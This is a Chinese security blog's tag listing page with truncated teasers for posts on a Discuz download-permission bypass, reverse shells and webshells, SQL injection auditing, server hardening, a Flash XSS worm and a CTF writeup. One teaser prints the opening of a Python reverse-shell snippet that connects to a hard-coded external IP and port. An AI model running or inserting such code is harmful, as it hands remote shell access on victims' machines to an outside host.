包含"soc 2 security"的全部内容
discuz附件免费下载器-安全小百科

discuz附件免费下载器

    最近关注的一个discuz平衡权限漏洞,可以绕过附件下载权限达到免费下载附件的目的。于是,自己用C#开发了一个小程序,给大家编译好的exe文件供参考。     0x01 原理...
admin的头像-安全小百科admin3年前
0160
python正向连接后门-安全小百科

python正向连接后门

    python在linux下的反弹shell代码我相信很多人都见过: import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('59.188.234.64',14575)) o...
admin的头像-安全小百科admin3年前
0110
浅析白盒审计中的字符编码及SQL注入-安全小百科

浅析白盒审计中的字符编码及SQL注入

在freebuf上莫名地被喷,可能是因为被喷让人气上来了,最后得到的金币比前一篇文章更多。塞翁失马,焉知非福? 尽管现在呼吁所有的程序都使用unicode编码,所有的网站都使用utf-8编码,来一个统...
admin的头像-安全小百科admin3年前
0110
lnmp虚拟机安全配置研究-安全小百科

lnmp虚拟机安全配置研究

    众所周知,虚拟主机的安全不好做,特别是防止跨站成为了重点。apache+php服务器防止跨站的方式比较简单,网上的所有成熟虚拟主机解决方案都是基于apache的,如directadmin、cpane...
admin的头像-安全小百科admin3年前
0110
php webshell下直接反弹shell(不借助任何其他语言)-安全小百科

php webshell下直接反弹shell(不借助任何其他语言)

    linux下,有时候拿到webshell需要提权,提权必须要得到一个交互式的shell。     我看了一下常用的php webshell,对于命令执行、反弹shell都没有完善的方式。很多web...
admin的头像-安全小百科admin3年前
0110
个人版php webshell的一些功能-安全小百科

个人版php webshell的一些功能

    网上的webshell总结起来有一些缺陷:     1.兼容性差,当某函数禁用后,该功能就不能用了。其实php是个很灵活的语言,很多功能是可以有很多实现方式的。   ...
admin的头像-安全小百科admin3年前
0110
关于lnmp目录禁止执行的绕过与正确方法-安全小百科

关于lnmp目录禁止执行的绕过与正确方法

无意中看到了这篇文章:http://www.freebuf.com/articles/system/49428.html 对于下面我莫名其妙中枪的事。。。我就不多说了: 于是我详细地把文章看了一遍,文章比较基础但也不失为一个引导新...
admin的头像-安全小百科admin3年前
0190
从新浪微博一处Flash XSS到XSS Worm-安全小百科

从新浪微博一处Flash XSS到XSS Worm

这是我之前提交到新浪应急响应中心的漏洞,因为我看到新浪已经修复了,所以发出来。 最近一直在研究一些flash,希望能发现点什么。 偶然发现这样一个swf:http://vgirl.weibo.com/swf/BlogUp.sw...
admin的头像-安全小百科admin3年前
0210
『三个白帽』某题的writeup-安全小百科

『三个白帽』某题的writeup

先介绍一下三个白帽,三个白帽是一个关于信息安全学习、交流和实践平台,我们以简单、直观、好玩的方式来把信息安全的内容表现出来。我们可以很方便地在三个白帽里创建、启动、关闭linux环境。...
admin的头像-安全小百科admin3年前
0130
重构Sec-News之路-安全小百科

重构Sec-News之路

不知道什么时候突然发现我已经稳定运行了近半年的sec-news(http://wiki.ioin.in)突然变得特别慢,为跳转效率我也是尝试了很多方法,比如加缓存。我使用了一个叫flask-cache的缓存: https://p...
admin的头像-安全小百科admin3年前
0140